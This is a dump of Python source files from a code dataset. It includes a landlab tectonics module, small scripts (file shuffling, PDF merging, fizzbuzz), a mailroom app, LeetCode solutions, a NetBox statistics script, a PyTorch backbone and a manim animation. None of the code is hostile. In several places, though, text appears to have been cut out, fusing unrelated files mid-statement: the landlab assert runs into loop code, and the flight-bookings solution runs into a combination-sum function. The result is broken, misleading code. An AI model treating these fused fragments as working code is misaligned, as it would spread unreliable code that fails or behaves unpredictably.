classes to represent particular baselevel/fault\n geometries are derived.\n \"\"\"\n def __init__(self, grid=None, node_state=None):\n\n # If needed, create grid\n if grid is None:\n num_rows = _DEFAULT_NUM_ROWS\n num_cols = _DEFAULT_NUM_COLS\n self.grid = HexModelGrid(num_rows, num_cols, dx=1.0,\n orientation='vertical',\n shape='rect', reorient_links=True)\n else:\n # Make sure caller passed the right type of grid\n assert (grid.orientation=='vertical'), \\\n 'Grid must have vertical orientation'\n\n # Keep a reference to the grid\n self.grid = grid\n\n # If needed, create node-state grid\n if node_state is None:\n self.node_state = self.grid.add_zeros('node', 'node_state_map')\n else:\n self.node_state = node_state\n\n # Remember the # of rows and cols\n self.nr = self.grid.number_of_node_rows\n self.nc = self.grid.number_of_node_columns\n\n\nclass LatticeNormalFault(HexLatticeTectonicizer):\n \"\"\"Represents a 60 degree, left-dipping normal fault, and handles discrete\n offsets for a hex grid that has vertical columns and a rectangular shape.\n \"\"\"\n def __init__(self, fault_x_intercept=0.0, grid=None, node_state=None):\n\n # Do the base class init\n super(LatticeNormalFault, self).__init__(grid, node_state)\n\n # Set up data structures:\n # Make sure the footwall location is such that the fault actually\n # cuts across the grid. 
This means the x intercept has to be, at\n # the very least, no smaller than the biggest x-coordinate, and if\n # there is an even number of columns, it must be smaller than that\n # number minus 1/tangent 60 degrees (0.57735)\n assert (fault_x_intercept0:\n self.node_state[indices] = self.node_state[indices-(self.nr+row_offset)]\n\n if self.first_fw_col==0:\n self.node_state[:self.n_footwall_rows[0]] = rock_state\n\n\nclass LatticeUplifter(HexLatticeTectonicizer):\n \"\"\"Handles vertical uplift of interior (not edges) for a hexagonal lattice\n with vertical node orientation and rectangular node arrangement.\n \"\"\"\n def __init__(self, grid=None, node_state=None):\n\n # Do the base class init\n super(LatticeUplifter, self).__init__(grid, node_state)\n\n self.base_row_nodes = arange(self.nr, self.nr*(self.nc-1), self.nr)\n\n def uplift_interior_nodes(self, rock_state=1):\n\n for r in range(self.nr-1, 0, -1):\n self.node_state[self.base_row_nodes+r] = \\\n self.node_state[self.base_row_nodes+(r-1)]\n self.node_state[self.base_row_nodes] = rock_state\n\ndef main():\n\n lnf = LatticeNormalFault()\n\n for i in range(13):\n lnf.do_offset()\n lnf.grid.hexplot(lnf.node_state)\n\n lu = LatticeUplifter()\n lu.uplift_interior_nodes()\n figure(2)\n for i in range(5):\n lu.uplift_interior_nodes()\n lu.grid.hexplot(lu.node_state)\n\nif __name__=='__main__':\n main()\n","sub_path":"landlab/components/cellular_automata/hex_lattice_tectonicizer.py","file_name":"hex_lattice_tectonicizer.py","file_ext":"py","file_size_in_byte":5257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"442177720","text":"# -*- coding: UTF-8 -*- \n# Authorized by Vlon Jang\n# Created on 2017-06-20\n# Blog: www.wangqingbaidu.cn\n# Email: wangqingbaidu@gmail.com\n# From kwai, www.kuaishou.com\n# ©2015-2017 All Rights Reserved.\n#\nimport random, os\nfilelist = [i.strip() for i in os.listdir('/Users/zhangzhiwei/data/1/') if i.endswith('.jpg')]\n# print 
filelist[0]\nrandom.shuffle(filelist)\n# print filelist[0]\n\nfor i in range(100):\n os.system('mv /Users/zhangzhiwei/data/1/%s /Users/zhangzhiwei/clear/valid/clear' %filelist[i])","sub_path":"scripts/random_select.py","file_name":"random_select.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"4965213","text":"from PyPDF2 import PdfFileMerger\n\nmerger = PdfFileMerger()\n\n\ndirname = ''\nf1 = dirname+'template.pdf'\nf2 = dirname+'template_zh_one_page.pdf'\n\n\ninput1 = open(f1, \"rb\")\ninput2 = open(f2, \"rb\")\n\n# add the first 3 pages of input1 document to output\nmerger.append(fileobj = input1, pages = (0,1))\nmerger.append(fileobj = input2, pages = (0,1))\n\n# Write to an output PDF document\noutput = open(\"document-output.pdf\", \"wb\")\nmerger.write(output)\n\n","sub_path":"merge_pdf.py","file_name":"merge_pdf.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"461413853","text":"n = 1\nwhile n <= 100:\n if n % 3 == 0 and n % 5 == 0:\n msg = 'fizzbuzz'\n elif n % 3 == 0:\n msg = 'fizz'\n elif n % 5 == 0:\n msg = 'buzz'\n else:\n msg = n\n print(msg)\n n = n + 1\n","sub_path":"fizzbuzz.py","file_name":"fizzbuzz.py","file_ext":"py","file_size_in_byte":220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"252822027","text":"n=int(input())\nl=list(map(int,input().split()))\nk=[]\nfor i in l:\n if l.count(i)>1:\n k.append(i)\nif k==[]:\n print(\"unique\")\nelse:\n print(k[0])\n","sub_path":"6 first repeated.py","file_name":"6 first repeated.py","file_ext":"py","file_size_in_byte":158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"444459453","text":"'''\nFunction to calculate the base population\nsize\n\nBy Dr. 
Raymond Hoogendoorn\nCopyright 2020\n'''\n\ndef calculateBasePopulationSize(df, baseyear, scalar):\n year = str(baseyear)\n populationsize = df[year].iloc[0]\n populationsize = populationsize / scalar\n populationsize = int(populationsize)\n return populationsize\n\n ","sub_path":"basepopulationsize.py","file_name":"basepopulationsize.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"638805560","text":"# -*- coding: utf-8 -*-\n\n\ndef isprime(n):\n if n == 1:\n return False\n\n # range starts with 2 and only needs to go up the squareroot of n\n for x in range(2, int(n**0.5)+1):\n if n % x == 0:\n return False\n return True\n\n\ndef rotateprime(n):\n\n s = str(n)\n\n while True:\n\n s = s[1:]+s[0]\n\n if (s == str(n)):\n return True\n\n if not isprime(int(s)):\n return False\n\n\ndef result():\n n = 1\n total = 0\n while (n < 1000000):\n\n if (isprime(n)):\n\n if (rotateprime(n)):\n total = total + 1\n\n n = n + 1\n\n return total\n","sub_path":"projecteuler/problems/d0025/p0035/r0035.py","file_name":"r0035.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"291213124","text":"#!/usr/bin/env python3\n\nimport sys\n\n# Data object storing donor information\ndonors = {\n 'William Gates, III': [261514, 392270.49],\n 'Mark Zuckerberg': [4918.83, 9837.66, 1639.61],\n 'Jeff Bezos': [877.33],\n 'Paul Allen': [354.21, 212.53, 141.68]\n }\n\n\ndef mainloop():\n \"\"\"Main menu\"\"\"\n print('Mailroom Application')\n response = ''\n switch_dict = {\n '1': thank_you,\n '2': report,\n '3': write_letters_on_disk,\n '4': leave\n }\n while response != '4':\n print('Please select one of the 3 options:')\n print('''\n 1) Send a Thank You\n 2) Create a Report\n 3) Creating letters for all donors\n 4) Quit''')\n print()\n response = input('Your answer: ')\n try:\n switch_dict.get(response)()\n 
except TypeError:\n print('This is not a valid response. Please type either 1, 2, 3, or 4\\n')\n\n\ndef thank_you():\n \"\"\"Thank You menu\"\"\"\n print()\n print('You have chosen to Send a Thank You message')\n user_choice = ''\n switch_func_dict = {\n '1': get_name_donation,\n '2': print_donor_list\n }\n while user_choice != '3':\n print('''\n 1) Enter the name of the donor\n 2) See the list of donors\n 3) Return''')\n print()\n user_choice = input('Your choice: ')\n try:\n switch_func_dict.get(user_choice)()\n except TypeError:\n print('This is not a valid response. Please type either 1, 2, or 3\\n')\n\n\ndef gen_letter(name, amount):\n \"\"\"Generate text of letter\"\"\"\n return \"Dear {:s},\\n\\nThank you for your donation of ${:,.2f}.\\n\\nBest regards,\\nThe Organization\".format(name, amount)\n\n\ndef filename(name):\n 'Generate a file name based on the donor name'\n return name.replace(' ', '_') + '.txt'\n\n\ndef write_letters_on_disk(dict=donors):\n \"\"\"Generate one letter for each donor and write on disk\"\"\"\n for n, d in dict.items():\n print('Creating a letter for {:s}'.format(n))\n letter = gen_letter(n, d[-1])\n with open(filename(n), 'w') as outfile:\n outfile.write(letter)\n print()\n\n\ndef add_donation(name, amount, dict=donors):\n \"\"\"Add donation to donors' database\"\"\"\n return dict.setdefault(name, []).append(amount)\n\n\ndef enter_name(name, amount):\n \"\"\"Input name and donation\"\"\"\n check = 0\n while check == 0:\n try:\n amount = float(amount)\n except ValueError:\n print('Please enter an amount which is valid.\\n')\n amount = input('Amount: ')\n continue\n else:\n check = 1\n add_donation(name, amount)\n print(gen_letter(name, amount))\n print()\n\n\ndef get_name_donation():\n \"\"\"Input donor name and donation amount\"\"\"\n print('\\nEnter the full name of the donor:')\n donor_name = input('Name: ')\n print('Enter an amount:')\n donor_amount = input('Amount: ')\n print()\n enter_name(donor_name, donor_amount)\n\n\ndef 
donor_list(dict=donors):\n \"\"\"Print list of names of donors\"\"\"\n name_list = []\n for name in dict:\n name_list.append(name + '\\n')\n return ''.join(name_list)\n\n\ndef print_donor_list():\n \"\"\"Print list of donors\"\"\"\n print('\\nDonors:')\n print(donor_list())\n \n\ndef avg_donations(donations):\n \"\"\"Compute average\"\"\"\n return sum(donations[1]) / len(donations[1])\n\n\ndef sum_donations(donations):\n \"\"\"Compute total sum\"\"\"\n return sum(donations[1])\n\n\ndef report_data(dict=donors):\n \"\"\"Generate content of the formatted report\"\"\"\n sorted_donors = list(dict.items())\n sorted_donors.sort(key=sum_donations, reverse=True)\n report_rows = []\n for d in sorted_donors:\n report_rows.append('{:24s} {:>12s} {:^13d} {:>12s}\\n'.format(d[0], ('{:,.2f}'.format(sum(d[1]))), len(d[1]), ('{:,.2f}'.format(avg_donations(d)))))\n return ''.join(report_rows)\n\n\ndef report():\n \"\"\"Generate formatted report\"\"\"\n print('Donor Name | Total Given | Num Gifts | Average Gift')\n print('-' * 67)\n print(report_data())\n\n\ndef leave():\n \"\"\"Quit the application\"\"\"\n sys.exit()\n\n\nif __name__ == '__main__':\n \"\"\"Always executed by the script\"\"\"\n mainloop()\n","sub_path":"students/julienjass/Lesson06/Mailroom4.py","file_name":"Mailroom4.py","file_ext":"py","file_size_in_byte":4202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"419723338","text":"#\n# @lc app=leetcode id=1109 lang=python3\n#\n# [1109] Corporate Flight Bookings\n#\n# https://leetcode.com/problems/corporate-flight-bookings/description/\n#\n# algorithms\n# Medium (55.08%)\n# Likes: 794\n# Dislikes: 131\n# Total Accepted: 29K\n# Total Submissions: 52.5K\n# Testcase Example: '[[1,2,10],[2,3,20],[2,5,25]]\\n5'\n#\n# There are n flights that are labeled from 1 to n.\n# \n# You are given an array of flight bookings bookings, where bookings[i] =\n# [firsti, lasti, seatsi] represents a booking for flights firsti through 
lasti\n# (inclusive) with seatsi seats reserved for each flight in the range.\n# \n# Return an array answer of length n, where answer[i] is the total number of\n# seats reserved for flight i.\n# \n# \n# Example 1:\n# \n# \n# Input: bookings = [[1,2,10],[2,3,20],[2,5,25]], n = 5\n# Output: [10,55,45,25,25]\n# Explanation:\n# Flight labels: 1 2 3 4 5\n# Booking 1 reserved: 10 10\n# Booking 2 reserved: 20 20\n# Booking 3 reserved: 25 25 25 25\n# Total seats: 10 55 45 25 25\n# Hence, answer = [10,55,45,25,25]\n# \n# \n# Example 2:\n# \n# \n# Input: bookings = [[1,2,10],[2,2,15]], n = 2\n# Output: [10,25]\n# Explanation:\n# Flight labels: 1 2\n# Booking 1 reserved: 10 10\n# Booking 2 reserved: 15\n# Total seats: 10 25\n# Hence, answer = [10,25]\n# \n# \n# \n# \n# Constraints:\n# \n# \n# 1 <= n <= 2 * 10^4\n# 1 <= bookings.length <= 2 * 10^4\n# bookings[i].length == 3\n# 1 <= firsti <= lasti <= n\n# 1 <= seatsi <= 10^4\n# \n# \n#\n\n# @lc code=start\nclass Solution:\n '''\n Solution: slide window + prefix sum\n [i, j, k] 其实代表的是 第 i 站上来了 k 个人, 一直到 第 j 站都在飞机上,\n 到第 j + 1 就不在飞机上了。所以第 i 站到第 j 站的每一站都会因此多 k 个人。\n '''\n def corpFlightBookings(self, bookings: List[List[int]], n: int) -> List[int]:\n\n count = [0] * (n+1)\n\n # 一种思路就是在 i 的位置 + k, 然后利用前缀和的技巧给 i 到 n 的元素都加上 k。\n # 但是题目需要加的是一个区间,j + 1 及其之后的元素会被多加一个 k。\n # 一个简单的技巧就是给 j + 1 的元素减去 k,这样正负就可以抵消。\n for i,j,k in bookings:\n count[i-1] += k\n if j 0:\r\n if l[0] == s:\r\n count.append([s])\r\n count += rcr_sum(l[1:], s) + [i + [l[0]] for i in rcr_sum(l, s - l[0])]\r\n return count\r\n \r\n\r\nclass Solution(object):\r\n def combinationSum(self, candidates, target):\r\n \"\"\"\r\n :type candidates: List[int]\r\n :type target: int\r\n :rtype: List[List[int]]\r\n \"\"\"\r\n return rcr_sum(candidates, target)\r\n ","sub_path":"39.py","file_name":"39.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"607802486","text":"\"\"\"Produce 
Prometheus-formatted statistics about devices.\"\"\"\nimport sys\n\nfrom collections import Counter\nfrom datetime import timedelta\nfrom pathlib import Path\nfrom io import StringIO\n\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.utils import timezone\n\nfrom dcim.models import Device\n\nfrom extras import models\nfrom extras.choices import JobResultStatusChoices\nfrom extras.scripts import Script\n\n\ndef get_module(module):\n \"\"\"Get the module of this file handling the use case if its called as a script\n\n Arguments\n module: the value of __module__\n\n Returns:\n A string representing the module\n \"\"\"\n if module != \"__main__\":\n return module\n return Path(sys.modules[module].__file__).stem\n\n\nclass GetDeviceStats(Script):\n \"\"\"Get device statistics\"\"\"\n\n class Meta:\n \"\"\"Metadata\"\"\"\n\n name = \"Get Device Statistics\"\n description = \"Dump a set of statistics about various devices for Prometheus.\"\n\n def run(self, data, commit):\n \"\"\"The run method\"\"\"\n # Delete old versions of this report\n obj_type = ContentType.objects.get_for_model(models.Script)\n name = \".\".join((get_module(self.__module__), self.__class__.__name__))\n # Keep any reports from the last 5 minutes to make this less racy\n cutoff = timezone.now() - timedelta(minutes=5)\n jobs = models.JobResult.objects.filter(\n obj_type=obj_type,\n name=name,\n status__in=JobResultStatusChoices.TERMINAL_STATE_CHOICES,\n created__lt=cutoff,\n )\n # Make sure we call delete on each job to trigger any customized delete methods\n for job in jobs:\n job.delete()\n counts = Counter()\n output = StringIO()\n for device in Device.objects.all().values_list(\n \"status\", \"site__slug\", \"rack__location__slug\", \"device_type__manufacturer__slug\"\n ):\n counts[(device[0], device[1], device[2], device[3])] += 1\n\n output.write(\"\"\"# HELP netbox_device_count The number of devices with various properties.\\n\"\"\")\n output.write(\"\"\"# TYPE 
netbox_device_count gauge\\n\"\"\")\n for params, count in counts.items():\n output.write(\n 'netbox_device_count{{status=\"{}\",datacenter=\"{}\",rackgroup=\"{}\",manufacturer=\"{}\"}} {}\\n'.format(\n *params, count\n )\n )\n\n return output.getvalue()\n","sub_path":"customscripts/getstats.py","file_name":"getstats.py","file_ext":"py","file_size_in_byte":2460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"338880241","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nfrom einops import rearrange\n\n\ndef regroup(data_dict, record_len, max_len, feature_name):\n cum_sum_len = list(np.cumsum((record_len)))\n dense_feature = data_dict[feature_name]\n split_features = torch.tensor_split(dense_feature,\n cum_sum_len[:-1])\n mask = []\n regroup_features = []\n for split_feature in split_features:\n # M, C, H, W\n feature_shape = split_feature.shape\n # the maximum M is 5 as most 5 cavs\n padding_len = max_len - feature_shape[0]\n mask.append([1] * feature_shape[0] + [0] * padding_len)\n #要改\n padding_tensor = torch.tensor(split_feature[0,:,:,:]).repeat(padding_len,1,1,1)\n padding_tensor = padding_tensor.to(split_feature.device)\n\n split_feature = torch.cat([split_feature, padding_tensor],\n dim=0)\n\n regroup_features.append(split_feature)\n\n \n regroup_features = torch.cat(regroup_features, dim=0)\n \n for i in range(max_len):\n data_dict['frames_align_features'][i]['src_features_for_align_'+feature_name[-2:]] = regroup_features[i::max_len,:,:,:]\n\n return data_dict\n\n\nclass FrameAlignBackbone(nn.Module):\n def __init__(self, model_cfg, input_channels, num_frames):\n super().__init__()\n self.model_cfg = model_cfg\n self.num_frames = num_frames\n if 'layer_nums' in self.model_cfg:\n\n assert len(self.model_cfg['layer_nums']) == \\\n len(self.model_cfg['layer_strides']) == \\\n len(self.model_cfg['num_filters'])\n\n layer_nums = self.model_cfg['layer_nums']\n layer_strides = 
self.model_cfg['layer_strides']\n num_filters = self.model_cfg['num_filters']\n else:\n layer_nums = layer_strides = num_filters = []\n\n num_levels = len(layer_nums)\n c_in_list = [input_channels, *num_filters[:-1]]\n\n self.blocks = nn.ModuleList()\n\n for idx in range(num_levels):\n cur_layers = [\n nn.ZeroPad2d(1),\n nn.Conv2d(\n c_in_list[idx], num_filters[idx], kernel_size=3,\n stride=layer_strides[idx], padding=0, bias=False\n ),\n nn.BatchNorm2d(num_filters[idx], eps=1e-3, momentum=0.01),\n nn.ReLU()\n ]\n for k in range(layer_nums[idx]):\n cur_layers.extend([\n nn.Conv2d(num_filters[idx], num_filters[idx],\n kernel_size=3, padding=1, bias=False),\n nn.BatchNorm2d(num_filters[idx], eps=1e-3, momentum=0.01),\n nn.ReLU()\n ])\n\n self.blocks.append(nn.Sequential(*cur_layers))\n \n\n def forward(self, data_dict):\n spatial_features = data_dict['spatial_features']\n x = spatial_features\n\n for i in range(len(self.blocks)):\n x = self.blocks[i](x)\n\n #stride = int(spatial_features.shape[2] / x.shape[2])\n stride = 2**(i+1)\n data_dict['spatial_features_%dx' % stride] = x\n #torch.Size([7, 64, 352, 200]),torch.Size([7, 128, 176, 100]),torch.Size([7, 128, 88, 50])\n\n data_dict['frames_align_features'] = [{} for i in range(self.num_frames)]\n for feature_name in data_dict:\n if 'spatial_features_' in feature_name:\n data_dict = regroup(data_dict,data_dict['true_ego_frames'], self.num_frames, feature_name)\n return data_dict\n\n\n\nif __name__ == \"__main__\":\n model_cfg = {'base_bev_backbone':True,\n 'layer_nums': [3, 5, 8], \n 'layer_strides':[2, 2, 2],\n 'num_filters':[64, 128, 256]}\n model = FrameAlignBackbone(model_cfg, 64)\n data_dict = {'spatial_features':torch.ones(7,64,704,400)}\n output = model(data_dict)\n record_len = torch.tensor([3,4])\n max_len = 5\n data_dict['align_features'] = [{} for i in range(max_len)]\n for feature_name in data_dict:\n if 'spatial_features_' in feature_name:\n data_dict, mask = regroup(data_dict,record_len,max_len, 
feature_name)\n data_dict #data_dict['align_features']对应输入\n \n \n ","sub_path":"opencood/models/sub_modules/frame_align_backbone.py","file_name":"frame_align_backbone.py","file_ext":"py","file_size_in_byte":4296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"424856778","text":"#!/usr/bin/env python3\r\nfrom peewee import *\r\n# DATABASE\r\nDB_FILE = \"Default.db\"\r\nDB = SqliteDatabase(DB_FILE)\r\nDBP = DatabaseProxy()\r\nDBP.initialize(DB) # Database connects when models.py gets imported from database.py\r\nDEFAULT_DB = \"Default\" # Display name on screen\r\nMODELCTRL = None\r\nQUERY = None\r\n# FILES/FOLDERS\r\nJSON_NAME = \"db_info.json\"\r\nJSON_TEMPLATE = {\r\n\t\"active\": \"Default\",\r\n\t\"wikis\": {\r\n\t\t\"Default\": \"Change my name and description\"\r\n\t}\r\n}\r\nBASE_IMG_FOLDER = \"images\"\r\n# GLOBAL VARS\r\nTARGET = \"\" # Page name holder\r\nTARGET_PAGE = None # Page object holder\r\nTARGET_PAGE_CONT = None # Page's content object holder\r\nIDX = 0 # Content.idx tracker\r\nPAGE_NAME = \"\"\r\nCONTENT = {} # idx: {header: content}\r\nWIKI_LIST = []\r\nWIKI_DB_INFO = {}\r\nPAGE_TEMPLATE = {\r\n \"page\": {\r\n \"name\": \"\",\r\n \"notes\": \"\"\r\n },\r\n \"cont\": {}, # cont format: {idx: {title: content}}\r\n \"page_obj\": None\r\n}\r\nTAB = \" \"\r\nMENU_BUTTONS = {} # ui/app.py -> App.bottom_buttons()\r\nFRAME_TRACKER = [] # back and forward button implementation\r\nIMAGE_WINDOW = None # ui/image_window.py object\r\n# TKINTER\r\nDB_STATUS = None\r\nROOT = None","sub_path":"utils/globals.py","file_name":"globals.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"268963434","text":"#Part8\r\nfrom manimlib.imports import *\r\n\r\nclass part8(Scene):\r\n def construct(self):\r\n axis_config={\r\n \"stroke_color\": WHITE, #坐标轴颜色\r\n \"stroke_width\": 2, #正式显示出坐标轴所以将宽度设置为2\r\n 
\"include_ticks\": False,\r\n \"include_tip\": False,\r\n \"line_to_number_buff\": SMALL_BUFF,\r\n \"label_direction\": DR,\r\n \"number_scale_val\": 0.5,\r\n 'decimal_number_config': {'color': BLUE},\r\n }\r\n background_line_style={\r\n \"stroke_width\": 1,\r\n \"stroke_opacity\": 0.7,\r\n }\r\n\r\n#过程中所用变量\r\n d_theta = TAU/30 #仅在30帧状况下是正确的,可以让箭头每秒旋转一圈\r\n\r\n#实例化主坐标轴对象\r\n cp_scale = 2.\r\n cp = ComplexPlane(axis_config=axis_config,\\\r\n background_line_style=background_line_style)\\\r\n .scale(cp_scale)\r\n cp.add_coordinates(0, 1, 2, 3, 4, 5, -1, -2, -3, -4, -5)\r\n cp.add_coordinates(1j, 2j, 3j, -1j, -2j, -3j)\r\n\r\n#小坐标轴创建与移动\r\n ###方便起见小坐标轴的创建直接借用了很大一部分群主Cigar666的代码,此处特别标注,表示感谢。\r\n c_line = Line(cp.n2p(-1.), cp.n2p(1.), stroke_width=4.5, stroke_color=WHITE)\r\n w_tick = VGroup()\r\n for i in range(1, 4):\r\n tick = Line(ORIGIN, UP * 0.12, color=WHITE, stroke_width=2.5).next_to(c_line, UP * 0.01).shift((i-2)*cp.n2p(1.))\r\n w_tick.add(tick)\r\n w_label_02 = TexMobject('-5', color=WHITE).scale(0.6).next_to(w_tick[0], DOWN * 0.4)\r\n w_label_03 = TexMobject('0', color=WHITE).scale(0.6).next_to(w_tick[1], DOWN * 0.4)\r\n w_label_04 = TexMobject('5', color=WHITE).scale(0.6).next_to(w_tick[2], DOWN * 0.4)\r\n w_label = VGroup(w_label_02, w_label_03, w_label_04)\r\n w_axes = VGroup(w_tick, w_label, c_line) #把创建好的浮标line和创建好的Label文字绑定\r\n w_axes.shift(cp.n2p(1.2j)+cp.n2p(2.))#移动小坐标轴到右上方\r\n #freq_value.add_updater(lambda v: v.set_value(5*(cp.p2n(arr_f.get_center() ).real - 2.0) ) )\r\n\r\n#旋转矢量与频域冲激信号\r\n arr_f0 = Arrow(cp.n2p(0), cp.n2p(0.7j), buff=0, color=YELLOW)#表征频域单位冲激的箭头\r\n arr_f0.shift(cp.n2p(1.2j)+cp.n2p(2.))#放到小坐标轴原点\r\n arr_f0.shift(cp.n2p(0.3)/5)\r\n\r\n arr_f1 = Arrow(cp.n2p(0), cp.n2p(0.5j), buff=0, color=YELLOW)\r\n arr_f1.shift(cp.n2p(1.2j)+cp.n2p(2.))\r\n arr_f1.shift(cp.n2p(0.9)/5)\r\n\r\n arr_f2 = Arrow(cp.n2p(0), cp.n2p(0.4j), buff=0, color=YELLOW)\r\n arr_f2.shift(cp.n2p(1.2j)+cp.n2p(2.))\r\n arr_f2.shift(cp.n2p(1.4)/5)\r\n\r\n arr_f3 = 
Arrow(cp.n2p(0), cp.n2p(0.2j), buff=0, color=YELLOW)\r\n arr_f3.shift(cp.n2p(1.2j)+cp.n2p(2.))\r\n arr_f3.shift(cp.n2p(2)/5)\r\n\r\n arr0 = Arrow(cp.n2p(0), cp.n2p(0.7), buff=0, color=BLUE_D) #创建围绕原点旋转的箭头\r\n arr0.add_updater(lambda a, dt: a.rotate(d_theta * 0.3, about_point=ORIGIN))\r\n\r\n arr1 = Arrow(cp.n2p(0), cp.n2p(0.5), buff=0, color=BLUE_D)\r\n arr1.add_updater(lambda a, dt: a.rotate(d_theta * 0.9, about_point=ORIGIN))\r\n\r\n arr2 = Arrow(cp.n2p(0), cp.n2p(0.4), buff=0, color=BLUE_D)\r\n arr2.add_updater(lambda a, dt: a.rotate(d_theta * 1.4, about_point=ORIGIN))\r\n\r\n arr3 = Arrow(cp.n2p(0), cp.n2p(0.2), buff=0, color=BLUE_D)\r\n arr3.add_updater(lambda a, dt: a.rotate(d_theta * 2, about_point=ORIGIN))\r\n\r\n a_group = Group(arr0, arr1, arr2, arr3)\r\n af_group = Group(arr_f0, arr_f1, arr_f2, arr_f3)\r\n\r\n ##旋转方向相反的矢量和相应的冲激表达\r\n arr_f0_r = Arrow(cp.n2p(0), cp.n2p(0.7j), buff=0, color=RED_D)#表征频域单位冲激的箭头\r\n arr_f0_r.shift(cp.n2p(1.2j)+cp.n2p(2.))#放到小坐标轴原点\r\n arr_f0_r.shift(cp.n2p(-0.3)/5)\r\n\r\n arr_f1_r = Arrow(cp.n2p(0), cp.n2p(0.5j), buff=0, color=RED_D)\r\n arr_f1_r.shift(cp.n2p(1.2j)+cp.n2p(2.))\r\n arr_f1_r.shift(cp.n2p(-0.9)/5)\r\n\r\n arr_f2_r = Arrow(cp.n2p(0), cp.n2p(0.4j), buff=0, color=RED_D)\r\n arr_f2_r.shift(cp.n2p(1.2j)+cp.n2p(2.))\r\n arr_f2_r.shift(cp.n2p(-1.4)/5)\r\n\r\n arr_f3_r = Arrow(cp.n2p(0), cp.n2p(0.2j), buff=0, color=RED_D)\r\n arr_f3_r.shift(cp.n2p(1.2j)+cp.n2p(2.))\r\n arr_f3_r.shift(cp.n2p(-2)/5)\r\n\r\n arr0_r = Arrow(cp.n2p(0), cp.n2p(0.7), buff=0, color=TEAL_E) #创建围绕原点旋转的箭头\r\n arr0_r.add_updater(lambda a, dt: a.rotate(-d_theta * 0.3, about_point=ORIGIN))\r\n\r\n arr1_r = Arrow(cp.n2p(0), cp.n2p(0.5), buff=0, color=TEAL_E)\r\n arr1_r.add_updater(lambda a, dt: a.rotate(-d_theta * 0.9, about_point=ORIGIN))\r\n\r\n arr2_r = Arrow(cp.n2p(0), cp.n2p(0.4), buff=0, color=TEAL_E)\r\n arr2_r.add_updater(lambda a, dt: a.rotate(-d_theta * 1.4, about_point=ORIGIN))\r\n\r\n arr3_r = Arrow(cp.n2p(0), cp.n2p(0.2), buff=0, 
color=TEAL_E)\r\n arr3_r.add_updater(lambda a, dt: a.rotate(-d_theta * 2, about_point=ORIGIN))\r\n\r\n a_group_r = Group(arr0_r, arr1_r, arr2_r, arr3_r)\r\n af_group_r = Group(arr_f0_r, arr_f1_r, arr_f2_r, arr_f3_r)\r\n\r\n ###标记:可能是由于写法错误或者个人理解有误等问题,如果使用list保存并创建这些箭头,\r\n ###就会出现所有箭头的转速都会变成最后一个箭头的转速的状况,不得已只能使用这种糟糕的方法来创建箭头\r\n ###目前在交流群内讨论结果是,估计是由于updater的实现原理,导致内部所有变量都会被记录,包括i\r\n ###于是最后的动画中,箭头的转速就同时还与 i 有关,这也能解释为何是在play方法生效前才会有转速变化\r\n\r\n#公式文本创建\r\n text_n1 = list()\r\n text_n2 = list()\r\n text_n3 = list()\r\n\r\n text_sym_1 = list()\r\n text_sym_2 = list()\r\n text_sym_3 = list()\r\n\r\n text_sym_4 = TextMobject('...')\r\n text_sym_5 = TextMobject('...')\r\n text_sym_6 = TextMobject('...')\r\n\r\n text_n1.append(TextMobject('$e^{j\\\\omega _{1}t}$').scale(0.7).shift(RIGHT+DOWN*1.5))\r\n text_n2.append(TextMobject('$e^{-j\\\\omega _{1}t}$').scale(0.7).shift(RIGHT+DOWN*2))\r\n text_n3.append(TextMobject('$cos(\\\\omega _{1}t)$').scale(0.5).shift(RIGHT*1.1+DOWN*2.5))\r\n\r\n text_sym_1.append(TextMobject('$+$').scale(0.7))\r\n text_sym_2.append(TextMobject('$+$').scale(0.7))\r\n text_sym_3.append(TextMobject('$+$').scale(0.7))\r\n\r\n text_sum1 = TextMobject('$\\\\sum {e^{jw_{n}t}}$').scale(1)\r\n text_sum1.shift(RIGHT+DOWN*1.5)\r\n\r\n for i in range(2,5): #主要是为了下标\r\n text_n1.append(TextMobject('$e^{j\\\\omega _{%d}t}$'%i).scale(0.7))\r\n text_n2.append(TextMobject('$e^{-j\\\\omega _{%d}t}$'%i).scale(0.7))\r\n text_n3.append(TextMobject('$cos(\\\\omega_{%d} t)$'%i).scale(0.5))\r\n\r\n text_sym_1.append(TextMobject('$+$').scale(0.7))\r\n text_sym_2.append(TextMobject('$+$').scale(0.7))\r\n text_sym_3.append(TextMobject('$+$').scale(0.7))\r\n\r\n for i in range(1,4):\r\n text_sym_1[i-1].next_to(text_n1[i-1], RIGHT*0.4)\r\n text_sym_2[i-1].next_to(text_n2[i-1], RIGHT*0.4)\r\n text_sym_3[i-1].next_to(text_n3[i-1], RIGHT*0.4)\r\n\r\n text_n1[i].next_to(text_sym_1[i-1])\r\n text_n2[i].next_to(text_sym_2[i-1])\r\n text_n3[i].next_to(text_sym_3[i-1])\r\n ##最终效果't1 + 
